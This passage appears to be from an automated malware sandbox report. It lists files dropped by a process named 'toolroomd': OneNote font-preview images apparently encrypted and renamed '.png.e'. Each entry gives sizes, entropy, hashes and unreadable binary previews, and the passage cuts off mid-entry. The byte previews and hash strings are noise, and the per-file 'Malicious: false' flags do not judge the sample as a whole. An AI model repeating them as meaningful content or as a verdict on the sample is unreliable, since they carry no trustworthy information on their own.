Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a........$<..m..@.z0.t..?....bPD.fV..$.,.g...T.CD.B.dG.Cw......7Y....[..!f=..G.P.z.M.v.e....!y.5.(..=..x.%..8..B..c...q?:..<D7..An.%J.,...d.<`........F.X...\|..'...gi....(..Sg.7.vP..f_..gO....`.u..d......X...~...B......R...:...4...Y..../..n."...B.......P..-.%O.7.PP.....l-.5.V....@..-G<W'.~.9\..w.i.h..d.i/1Sd..F....l.K@.s...;.^..%...<...27q.N!.Ra.".`.v.....y0.X.5B...Q.).L...m.av?($.......O.....7...P...K.9.P..Iy_c.i(8..".Q1c.jp-.3...,.........M^.%..z.{....E....,k...?..P.....8..a.([...0....p.......0....fV..>......`..^V. .....[I.2..9K.O....^B^..?..Ds....r..[.d._..."X...H.5.r...v2p.R......<T<..i..d .S...m..I+.`...x.'8....vOK...K.A.U..R.c.u......?.+.-`U\|\...w.4....D+.,....$.p..U>..]..C.y...~v..-."..^k..@.zYG....)0.q.%.IH.:N...".j......)\..`..b..q.5Xz_.`Q.{'......R(.L.!I.1..q.L..3...'6...8.3.26.'.B....u..e...r..TX.9Z'....7B.z.r....i..z"..FP.<U....S}Po7+..S.P....g"..p.[4l...hc

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Telugu MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1386
Entropy (8bit):	7.417876132361699
Encrypted:	false
SSDEEP:	24:YubFVyufHQtn26vBaRipzyFdhNn+qeufCgHN73lm9F5k83icJOsePc0m7:YubvF4HBFpyFlcuqgt45kYibNpq
MD5:	08AFF219C32EFCE0C910BE73B097CCFE
SHA1:	005706C1219CA6E1285839423DEFB8E49E1AB294
SHA-256:	8AC643C1D7D7BE208AB074DD41B2A0027935BF47DD322B8CBC335431D0A49882
SHA-512:	E4A037840256E9E302A91B48379E9261A2E9BFE8F862B8FFA4366B56180D01AAC4E2207B0F925D027356DD51562B699E1BA7A6FFAA33C249843A41C42EE6D29B
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.ar.&3......rv....r.......R..wE.Wd.L....QN..~..[.4...7.d.`iR.}.....o.......Y.'.i.ytk..e$.$h.7.....].KJ}.r.).!.H.>..D..{.....Yj..3..U.J[B.i.[x}.PH.c.....l.`..3..$&.....3Eq..K...z..?..r..H..g....dBB..lXH...i.8f.S\|..P...x.\.....=....,..>'(.....LLn.:e\|.t.!^...+j.5..[41.P..S.<?..a.ii7..Uh..]n`L...K.....^J....7.C.p.1....Q...l...-LU...Gtjim.+..7=h...~..jB..OJ}..#5.8..O...#v..w..........iX>...+...e...`HO...-.y.2s...O....A.'..D....Y..u......h.E.../....u.}vk.s.y...Z..d@.=h.....~..b-...3.......D.~1...9}... '......\|........R.C...........9.,....Yh.wW.NT..qv.3....$.>NA..#..,..~Y..:,[R.9...k.........^4.#.<E..X.]....~@j...._.......?.+.....H..:..15.....v..Vc.$x..@.k.....T..z'.5.(...V..C.`]e..n.lb...O..s.\....k......UK.5]q\...n.[..faA"l&...H.....1@.E....F.pf...?2.....K\|..:.)I...G@.k..../.X.(..'.P:m.nXS1...}.N\|.;=.>.....)....aq6.y.b[..1.>m.........M%.V2.M.\|s.$Z8....6..g4.^<=y.}tB....S.........:..S....c..u,!.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Telugu Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.634334171026211
Encrypted:	false
SSDEEP:	48:C7FJQgXUkrmSvSUeXDq+nlsC+fd/s14jNpq:C7FJQg6uYpn6C++qju
MD5:	9F4BF5AB610CD1F30A8C45C53D77604A
SHA1:	56BAA3771C597918E0A755DDA7FC920069A918C9
SHA-256:	CF8328B16A6995731BC5F42BE8B63C07466B8A221A2895649091730628DA9689
SHA-512:	3655FC70F27DA6A8005FA95D5ED23AFB53E311632BC9BDE95CAAE082D7EBDF943C93C5A78171F253A46B003C50A72EEAE8C4117FF224E5D5C8D066282E030B9B
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.a...e...'B.>..F.K..0..>..w?...pg.i...~..>....K........2.s.$J}......oF..rn....#..r].vM.T.3J.DCaTq.x.'.o.:z.g.%.....m.....v0.=..N<R.,......."......D.6..........Q....?....#.(..M}...A....o]:(..\|....7&.t..U.b.GU.O-.P;.......A...6.x.r.Z...L...R..sq.\....E1I_q...y.+..W@.}.W\.O.#."4VT......p.}.4N.$L....I7R\.:?...4;(o+.=.x......Bn....,$R3_....[.....wm+.....H`6f...Mv...@...r......f,\...w....AjUlcT..........X.'/.....D.(."].j.....>...aZ..;Gys.......2>iI..'....7a.E.31........M...5O!E/:.Z..4....3..\|\....-i3....^..Z..u1&....zO..y.M..>...P....C.S.lH..&2).t..S..A.ia9~NO.x.`H...L.>..yJ..-?.........i..~...v}..9.m.........^.."..n....8....}....S....l2..........2.=...+.{....X..W.-...xPU..%OH....I.&....`.d.K....Mi..7.b..y^9u;]...YUY1....(..4....h..0..3.e...\...B..X...A.N.....n.tn..k.3i...Vau.Y4.<.CA*.A.....m...o`G.P...N3;.M...~...........PDS..gz..2et.g....=.wD8{jY.03.G...7..V..K..R..Y.$4UeL.P'.y..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Times New RomanRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1962
Entropy (8bit):	7.637838003575111
Encrypted:	false
SSDEEP:	48:Elku5njQSs8VnWU+/1+fl7HLnVv7zpBdAzBNNpq:mku5jQz8FJ+NOVVvP16Nu
MD5:	AB8E9F27EFC483BD65D7E9EF5117524E
SHA1:	629CE036185271F138FFADB2E3D2650EEAF21522
SHA-256:	A7184DFB4F4235DE61E4AE7F403D7A4BB3FA51945251209B5173BB5CA7FC94EC
SHA-512:	9486AC7244CB177622D97A6E6E3780D18251401F08A68781FCAAFF8AC07CE6FAE1989F9AD336352D583439145CC0BDE8B815699576757691AE48FC7EA0500A97
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..]....w<{\w..#..Y1.._B.?~H...^d..FI.V.3...7_....4.......g..#..^...$.].d.Z...H.$..[.......%....r...na.q...V.y..8.....8.....8....x....b.....D:xPH.].GL.&...\|..l....c..8.f..w..F.. -}!HLt..rT.}.n......h.....c..wy.0.M.n....\......q...'.G..T.;.#V.A.J..N..e..'..tr........t. .tr....)....\|....I.f(>5l.^...O..M... .z...1..1..\|.;...0...z..^0Q...r.s8..h...b..h....H.gi....Lne.^..@...............3...x...P....\|(..r.u..Y&%}g..q).j..~9.2N.ka.......S;....,.>.......Y....m..........09..\.......#~P.p..a?....-].. 3..`.6.l;#.^.b.EC...^Bl.U....e...N.%.(_.i...p-....u".e\...M.G..56 ..'.rj..L....2y....S.Q.3.G+P..2$....1..H}.I~.wB..":.Ho~.#!..t...\.8.U.l.,......AO..#4&.#.T..{.:...1..k+..i.7.?vT..u..\|\.t.$.....?".\|.T...&...B...t...B.....L..k.r.x...r...E.L..]bc.,...N..."...O8...Q.....o..+..mc....T.h.Qg...8....@4..........B..W5....)....aA~~.?..o.D..L(........`3a.-..#f...!6.....7...^.<.....Q....... J6..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TimesRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.187624451546125
Encrypted:	false
SSDEEP:	24:EM/8IEAEvPjKrOkZ+vQCIV9h+ikxD1sePc0m7:EM/8rAgP2SkZ+vXIVT+zd1Npq
MD5:	05FBA950FFA013FF8249555908D76C33
SHA1:	D63643CCBFE0C3D30CCE2F95E93773C77C8A3EE2
SHA-256:	F2431D19900ED70ABB1EDDF6D2DABD4C14B07EBA344A1D6B13DE44C6679CD920
SHA-512:	0D7B35BB21BEF0C92E2CC26379BDC385B0B7601087838BCDF0448E4289CC6306290CF91C849106303E005A031AE7245A217DEFE6732D78C2EA4AA67D9918C169
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.7.Xh`-...W.(d.....pvX...7).'....[IM.H...{#..w..Y,.eA.3C...?...L.S.r....,..W..yZ...=]..Dh.Mk.K..L.t...J.;7...k.....x.../S.......~;...8%L.U..H.A/.[5w"..$....`...j.ZU.....m..\S.l....,a..\|.....7..).w..e...U..?5....6.....G.Ic.U..Q..b.....+..nk.l.n4.o..R.r"=\..j.[. ....n.{.Y......vY\.^.....j......./xM....9.g..).v~.$_.n.~........2......#..u.g...I#..-.!4..X.......%s.Y.3.}..FHj..+..W{..D..N....t.:h'&.Ng=~....8.-F.'.....rI....%'.......d,.Q..T._;.P9._..e..= .&..;1.p.NS3.s.v7...r...;!.nR...J..%T....:..7#"e.,OGe}.!g]....o:..b %.....GI.E.c.!gmKu."..S...@....[(.Zv6.R.?EX"...V...k...S...J.....T%f.@.#...m.g.^.U........z..m[..Os.g.I....=.Y".....mO...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TrattatelloRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.6276746166270835
Encrypted:	false
SSDEEP:	48:CMW/rcl5pPkLKV6Zq+b5zt2YLD0f/MBOncXVTNpq:CMIo9sXZ5l3FBOgVTu
MD5:	5EAF558529E16BCEA21B23C4AF1E0B88
SHA1:	B953A3DC2658D95B6EA339C7E1D5F795ADB6A436
SHA-256:	F05B757013D1A1D2EC786C7F1E7D0EA02833A2EE6FC6462783D21E057447861E
SHA-512:	7D54E1C851A4C5ED037ADFE9D7099E989293535E8DDB45AF816362CA5CCB14B86AE670A40D9B4D243E587CAD211B50ACAAECA2ACE99AC134D89E8AD3E33624F8
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.a...R..4Iy"......A.._%.....3....aY.2....v.t..%....-n....1./..{.....+ty...w.>)Y]..v...+.7...dex.8.ubv2.X.k.............G<..B.q@..H[...p...\.-.6kv`K......S...4..z0....q0..q.Bg.>...N.3.-r..~........W.@T}..9.\+05.Mg}&u.e.l.....JV.=c^w~.@G<s.....}E...4.=.M.U.2.Pkp.\|`p-)\\..........,...iD....-. kP?.k.J..k..}..I}..... ..Rx.....W.VA\.}4-.B.....MJ5.......g.....vp..C.J.[..'5.....fr~.}?.YP..&.\.<~....d..g[Q.CC.V..."...Je."/.4...x....Mm.y`..~f=b..F.zW.\|.n.o\|..G.C....\|...5..@...R....\|.A.j...6..1..(..u8.9..k........N@eh.8.T....d.q.A..<..T=..x..k..b9...r.OI(..d.0....O...O.....ij.]2....c.A......Pvcrl".t..K.o.{fc.q;wW..+.A.-.....R..}......I._.%<E......O.J.d1...y..V8e..G7."J.w?/.7......c....7S{...._..\|@....~[#.?.[..@...2\>H..I..M.x.e...!.<.4^....7...J..W...Q...X...O1.L.;..M.I.9u.:R..f.fG...v\|....B.l.....x.....l.8^..UP.4..2.._..(P=.+.D.2K.A....!,n`.2...m..3i...-......^o^..T....`....*,..@....P...n.......{D.^.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Trebuchet MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1650
Entropy (8bit):	7.569776957044259
Encrypted:	false
SSDEEP:	24:EBICPVXPzb6ErFcnJYIZJ6daEYHLcIz1A4UGiTNhRsxpqse39xBOmZDsePc0m7:EuCNfftcnJqMrcIeDsxpqp3pTDNpq
MD5:	87B95CC2B4CD0BE322156D362615A8E7
SHA1:	4689E07777B82A39280904E8294ACDB7F4D607A9
SHA-256:	8A666CC6C9D9AF73CAF2C16869406B8E5E49B0C72713DC3E218E727988A85E67
SHA-512:	214A01A3DBCAC868B35161CD0E6168E007FD4C928C6E7CA419775C3641001C5339A0686DAFC24B4B5FF7208106AC2D7E9904AB1A0F70DBFF899FD1619F4E5F04
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..c..K.....T.a....^....$.v...29..5m.\..TL..g/....V.jv.:....&w.......o.../.p..nQ...QSi>bR...4...j.(t..A4].%S.m....oI..j7.._7.F.E!..{.}....e...i.~p.O.n...??...z.....Q.S.s...6.y(...]~!...\|>.lQ\aeHF.p[.cx.....9.....1.?.(.w.7.L....,.~.....zp..,.S.7..O.J..S.....Q?.ka..Oh.5l#.u..e.3...q....T..5....#.:.`......h."...a(jO...(.7.a._..c.J.~rD0j$..S.[.l#../....4..\|H'.oL.7.f...'...# G........\|..A..D.............!.Wc.0...v.&we........+D..C...c%q.`.v.H\?..M....M,...I."W..{.A....`:..{.+Z....m.jtS&.u.M.}.B.<..MF.(...Q2..4e.d.......F.K.. .i..l... .[X....+$V.}.iT...S.J.c?.{v.Y..#=..nt.`t....N..b.P.~....L.,.f7....[..2.o.X....A....<....s.71...[...:e..3.qb..nT^ ..'L_...\..27..d.M.G.i..(..2g@....e-...]G.d"A.k..^/e.p........9......6#.X/.b.....>..B...W;fp.......m~r..g....x.LB..."....+....E\|........7...ZT..Ai..l.3.h..n.'.C..Y+...z+......F."~GW{./X;..........:C..n.....t`......g.Z.{..:.<h..$*...5.6;.........a..8...t.i.O..F..+

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TungaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.223459069512634
Encrypted:	false
SSDEEP:	12:WQwJ9lygV2dy7GGi9x44HynjgIQAXjZyWCm1COzQDhnZ6IzY9F99OsewLYTc+qGq:Bwr2s7jiHyjgojYmYwmnUF9AsePc0m7
MD5:	B4656DF2EA6E33F4D18E31B60AB65C38
SHA1:	B72844E052EB7B1034D34604932BFA9D0BEA66E2
SHA-256:	C94D5C6E98EE54F6CB73005CBFD1A9705AEB137F32C659F2E7ED4659F8009706
SHA-512:	33FAF6C7B3A0B89A5E433E0BDDBC15F18B92BFC73ED4B07CFD14350D0CD73481366A358BA4FB58B111412AE7D06F9E150A9F64CC1BFAA97A567EB181704CE3B1
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a>....1,.1D.).c....nee.!7.q..b...\.jdC>,r..;...s.?0...=....}T{lHD<...A...I[.NW].....Xg.......Nx.r\.L6.H..C..."s..}m........~#2R-.-5.!bR:..+ksn.Pg....z....t.d...x..o.n}....$x.....1}.92......p..M+,.z(sP..,.4$PX;.../..C...Nm!..\.;......+.]...1..........}.j. .........h..e.X..g.m#..l.Bp.../.\..q....^12i..SI....\|..."g..Q.W.....a.kG-..4g'V... .:.G.^0.I.._D.Hk<...A/[7.)f.D.-.j.l}O....`]X&.P..0..)x..........o....h.8.I....T..<.b.....[.....b....7)....w..ms#..;..E..?T#........X..\..<I.}}[.ls.C.~..D..R.........H)&JN%..cd......o.X...P...+.7A.p.b..N9.D!..9{.i....F;.i..cm..d.v.=..}....v;PL7_T.H......A.9y.@q.......>.R[5t.{-Y.........P.:...~.%./.]h.br4.X)...[.q..."...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.VerdanaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.430677258245956
Encrypted:	false
SSDEEP:	24:EWrgzodYIh3H02hT3NU1pEsiiBnyoI5Ey24dIK0sePc0m7:EWMzW7upExiGnV0Npq
MD5:	5291B1500354D1635EC8C13605632ECA
SHA1:	1AFA7279659E5B265BF5957BC7D612CC3F5E4474
SHA-256:	A647BEB16E68A8BC4DCC16A125A4BCD7C71E6B89135B39FCEBC7749DED896666
SHA-512:	BEF1B491CD3E5E4364A3BEDC84BE309ABC2263FCCC295EBFE496D7460624739982710CC49284618719B4BFDEC0F098194233B62D1E836B2FAB56448CF479EDF5
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS....e5..i.W3U.:....E.....~..;/.._).....;..B.}.fi..S.....Y.Mw...x..G.e..tP.l....].c(.w.(...!.0.+..,nL..k..f.`...3.Q....eX.2...E..g.7..9p..fgG$..a=R..Q........;....L1....RI_A..)C............nP....Z$&.\|.=I....4."....Y..;.b..!m..(.....E.......$..0...8.</W.?$..F9l@<.ms=u...1.t.....p.>^[v........2..[.......y.T4..h.kus..yg......u...P...n....X..%.%..g....FT.pE. ....4.S....-j....s.8.=.q.DoR.uY..`.....k..W..J.L..$....c....E..d.L.&.'.......d,.[..._.o...Cc....5]S?;;nom"....A._;..9v...a..2h..6U....T....G.AD......+....Y.......B.u....6.N.?.#.....G..wCyb........N!...[.W..?...P..TX..E.0..9.......` .".-.2\.[.E..7...2...fR...b....b...4.....F"...k]..r.(...;.u.j.G<b.+d......Kf....PY.......y`.s..$<....@...o....d..t(>..U...].....#a.>E~.).........TN...pb.EI...e..Y.....,H.l..v.:.z.U...=..S...!j)..6...f.......n...O.h$....I.....P...C.*B....._j..4....up.....j.:C._..;.\4.U!H..@S.,..e...qK.....Yj...._.@..a.K.....v.Y.(...J.\-

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.WebdingsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.507989977091624
Encrypted:	false
SSDEEP:	24:EEmySvfpyYsdMsxyUziQgq1g0mcDvfGw95OqMgvMvfcV6jFdz9WrXsePc0m7:EXhyVxyUO3qeXcDvWfqafcQFdkrXNpq
MD5:	61A27DF5B57B5B547E54725DE92C45D9
SHA1:	4059661ECD25A2A39B8192126A7FA2F65067744C
SHA-256:	34B8A314AE5AD5D794FA9B95FD2500ADEF88E23C56B798FDC8A78AB7B0D6F96C
SHA-512:	0CBC3240C6624CACFB018CFDE453A04D176631FBFA4DB708D62C44492BFB35C23ACB632329D25EA386B7A388C696AFE623A8066C69C60E6D8E6D9C0D28F2FFDE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.)E.BD..urS.......-...L....._x%...@...v.G..l..w;=.=pY]:..2O.[.[..)V..+z.v....\|@,......I.o./.5....6:.c}...=.....,a.'xXm`{'.P:.V...G.....3.<fB]L..:....H.5-j...g.lGX.(.....~....Os{i.f...W...$~8..#T?...m......?6.................S...(....?L......PY...m.9...W2.,........GO.S....u.:..?...f...=\.Iw....;:!u..@!._J..e.H... .....X..3...>_.R.).s.P...Gai./....b\..`.z.....a..pP\}6.N.B..te0D..d.g.Y...tSO...I.G.....S.q..1u.[.M..D..V..M\|...l>...?.#.....m....a....`u.K....w3..m..W..Su>...hXrHG:.{....4+b.*.&s..c.!}hp..(.7.k.l..."l...$s...wZoH\|b9....].q]{2.;4.+...<.0w.~.xH.8....EP.....s.(8[F.......8.5}.........G.}.(xEw.&r.g.../,..)E,Eu.JSi....lI..i..Pf.!.+:H.u.....>..cO.L}.y........{.dx.h.G... ...`.....[.(6....._...1F..J.3{.$.u..........j.9....e.b.......k"\3o..{0A:.[A.p...........9A.Ht...z.>vB.D...L.l.%k.......UMT.i....T.. ...(.}.y.a..Y~..rl;<.....0.\|-.....6.5.....-...3G.!.fI.S...H.y.M^O_b.h.{`..s.....w...R.....YT`.....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Wingdings 2Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1514
Entropy (8bit):	7.5152706992466785
Encrypted:	false
SSDEEP:	24:EFvkPrOq0WsVE0EYyuVZllDIWWbZIGdRDFhJ/hlln3WUh9ttGsePc0m7:EF+AW2zUuHIZb2GdP/7JWuftGNpq
MD5:	80F8FACFE2ACF076813D45471E94949F
SHA1:	90A66D12453EEA63DF79494F1DA3D0D52062BF72
SHA-256:	1302877755D4126AD04D33F7EF1A6E8751CF39E78188E722362FF821F43D636D
SHA-512:	0EDE28C6E98E61C5559DE768EA6FC967B0EE9ED19F1A97D5B375E89E99C273810785B4AE45EAE60E38BEFAEADABB6184F332B2C2F2D8CE6602EA683653153D09
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...a.P!N.b..z)......s....]W.w\rGB..hMz...I.X........M1....[?rH......5.O...b....f..nwhg^&...@k.@N..ck..\.S.0.NPyh.Z...0@.I....%.t.Z.D.vX3..z.........c~......+..p'...../...j.......g.o9#./..f.i9..9.Y5....".^+.}..}..&...t..<4&.s.x .................H......#.dn.R.......Nu.`. 7.q..h..R...u...7.).r.h.%.EK...=.d....;.....t......j..)..(......#...y.....-zy./Z_V$.......3...SL.....2p.o.......m\M....y.....J..f.F....r....Fp..U.......W.. .Tb..X...W.].j...E...m.idw...,.q.~..Zm.8.B.f.....z...73.R.:.7...\B.a...~k].Y.P..$[.. .........I`.8...H.x.f.]y:k...;H.p......9'`$.0...sW....y._q........'..p....^5.Vy.&.B...y.Z;7...v.J..;.yyn.nj}R....6.y..`Ekja..15.t.C..].........&.......xK.....(..I`..~.Vl.#q...b.~..N......v....k....i.\|L2..Sx..."......h!....F.......-\|._........o...&.z...u?..w/0.>...gp)9...!Q....J..U..\|..C....:..~...N.b..._G...,3{]..E.....,...?..0F.. ]...\...%.~.(.t.eJl..8...M#.:..p.1W^.Q......U"D51jz..z!.j.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Wingdings 3Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1538
Entropy (8bit):	7.516562701868853
Encrypted:	false
SSDEEP:	24:EmcJDWZnXgEyKVdQcG4nGZFZvfoA0ClXvEwRBGqsgvYuDf8Zn65sePc0m7:EmEKZnXfE/rtgAv2yrDDfioNpq
MD5:	52D43B16ED1AAB8DE447D61431B1A59B
SHA1:	6DA1CAAB2D84507936F774712AA03451A0160AAA
SHA-256:	844060FE3E86AC0480CF14B8288E79E60C08EB039953952EF888C4BE3F687A64
SHA-512:	F9018398C132778BB4B385C7C2A74A251C5DCBDE994DFDBB23AC32262D0BFD968EEAF0919349885D17AAF822184B9709F03BA627F636B3F24B6CE721952AA058
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aN....y.~....0..N".\|..hn.M....u.=T....M.L3......s.b.y.b...g.'V...1.a/7{.@......E....7..X.....1e."2.,..;.7.:t.......2W..b35..G4x.f......O..E.`{.L$@.c.7....... ............>%\|.IH`.....-l.~.?I.s..s.u.R..4P0)...S..g.=%..\.K..<..>....8..]6WI".B.`."y.N....Sp..a./.v......}..X.....$.........k......./[...+.<U.n.V.E.....fZ"Y.A..9.R0%.f....lu.:D.......a..v.RV.R....f/TV.Lx.d.m.K.0.bY.......}.~.... ..H.\....m....0...+>%..;...D...T..t..m..`..i.w.Ya/h......\|93.f.....e.Ct.OZ.].....NN.<.(6...ZO.i&.<...S....6.b.Z.. ......h....8yf. ....!..+q...c....a./...#...O.)...X;s....(...&.....M.7.......'....&...g'cH;UK..........).S&..+T..7N.l.o..W@....b.,.9)...A."...X....*...,Q.,-w\|...M..X..0m........_e=j..l...j?=<N.....PH.....M.a..{.R6l..Asp.>.u....^$..H..n..No.....\|.yK.....!..dU...8.[.Z..k...4..Q.$...U...S..b...."d$.'k...2.5.eD...w.....>...V.b.9.........d..,D...w0a......V..'c(.I...h...F>.J:_N..~...P.j!.'6>.].Y.u..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.WingdingsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.450142827887951
Encrypted:	false
SSDEEP:	24:ENlwims9aGUvW/6fa6GxilvUFj8vRvoKQzMSM52EFcdm5J+dFnsePc0m7:ENlwbs8GGW/6fatUyFQvRgHzMSEFcd+V
MD5:	CD8AA937011C4800D82861867D04D9C1
SHA1:	FE1155E2A20268BBAC130F33DDCF0DAF747F0307
SHA-256:	89383E093E693DC4B852DB0E6792B54785993491CF2C4880E0F474925E149C09
SHA-512:	03EC378BC3A57240182DE2F119ED299EDB63B8FC875F531A488420BA3FDCD60B44DD332BFAC5CF1BBB157A694CA247E29C49E1667643862667C0B0E14AD264ED
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a./...}.?q!.p...i.....#0..T..2......a.<eWpqi..y....A.+..}(....d.?~...C.K.J.../..%m...Wd.!e)...l......m.U....iG..$X>.....e.r.X`..DAL...2.....i).GPK;......OP..)\F...3;..Q.......B...[v...x...uN<....\|......f..4VXs.oF;...c..G.C..f.[..1.tJ.r1g.+....'{0...R}....D........mi...V'J..T...&f.;$...g.......h.-....P.m....0.UL....b...[..=U.N.........L..c......r.>.}......1.....)...:.-0....K...f...1...].....'>\.A.Cv6.....m.&kp.S..#.f6...bA>.4.'0.D..:-.5.. qY......WB9...f?...,.8.;.,...[.\|..a...H.7...w!9...e.I{..s"#/..<..Ddo.@..9.i.....'.R.x....9{QR..6.B.9...J.....VB..6.jU.?..[......L...4..&..{.OH8_;..!&.x.Op\.O.../.&.&%vx.....o..=......6..9d=C..#.F.0..O[.@..[....b.....D._......i...,K~.t...l0..D..;X.e..1f..L..D.]..^n......A....z.....C.ty.H?.N.i...o..U..SBgmi....F.<..g....+.h...7..p~..FUko$..-.iE..E..Z....[/.R..rr...,X>.c......3...1k.8...HQ..~..^<.e...<h-..T....$.....`/.....\|....9.`\.f..D.Xc..O/...../...F.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Yu Gothic UISemilight.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.453203266817774
Encrypted:	false
SSDEEP:	24:EYb2NurjP//rKPV9PYGgwc35fKtm0O8A6bMnIsePc0m7:EYSNurjH/YV9Q5HAtvrbMINpq
MD5:	E25D1EE8E8556EACF42858822147DFE7
SHA1:	D5BB59DC7794DCC1C094D4B87AF2169FCA884478
SHA-256:	782D9B8B104422AE8EA0CB3F66326085840142380BE01319F96AD157BBF26ED1
SHA-512:	3F159F873CE6C0445559FE3BB5AA8CCA52372C79212EEEE33BE147618545CD513A3E01C719E3D504F2DBF718EE72D1503FF24D5D731981D80E2549D5943A3936
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.wc.P.#..".Jb.....j.....~.....Q..yo.Me.......=lV..F}..j.(9..x....)...n.....4...2b8R......@.O..:.]...p..o..<...Uv........6t....SK>N]/.z_...W..q<.J`.DNF..U.O>......w..'{..j........+\...rXT.`.m..u....._.n.ti...........".xe&C.X...U.....%.W...yu..P..c.).$b..a.w...V...A..n.Q...(..t....90.u'.t&#H....T..4...px....>g..E..z......_......Y.c..M.S..-..g..'........y.z..P`..\.......5.....A..j....O...2.I`.v...([ ..zKgv.?. ...=..3w...L..L.s..X.^.:....@S.)."b......rt..'S...P_=P .{.\M..`i&.........^.G.....(....`.2.p.AgQ..4.kK.}/1.3....p.9.8. .\...&...a..n(X.9!...6.v..gb...Sy....!A. ...&h.........x.M.P...^8~.....r.O..P.)=..'E......z.,t]k.l)j"]7..9L....qg....n...<..4.V.Y..R...>?..T.-P`..>.x..e.......t,...."&AfS8.k_..K..s~...5...O...F...:...E....i..P...<...H..(.@..........^._..>.AH...t..Ad..%-F.&eR.I.c.= bp!.3K.]..X..J%..0...6...v;..b.I..X.d.d....u..Y..y...Z_v....?4Yc.c.....u.Ni...f.cn.%...3N!Ab.........Q4>,...n,.8.....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Yu GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.352991049608917
Encrypted:	false
SSDEEP:	24:E2aFZXHaMwqqPESAAWLyAkl4emt/Y7MQkJm02raEZFpZNEBXOsePc0m7:E2WKjRyR6W/OMtJwDDN8ONpq
MD5:	D9E4ACA975A4F617D53930BF969F98B5
SHA1:	C22F167796F0ED92D7FCEE145E8B54E947AD32FF
SHA-256:	73F55E8D80457AA91F7F347F1F0EABF90F0E251ECB40568EB8DB000D632DFF04
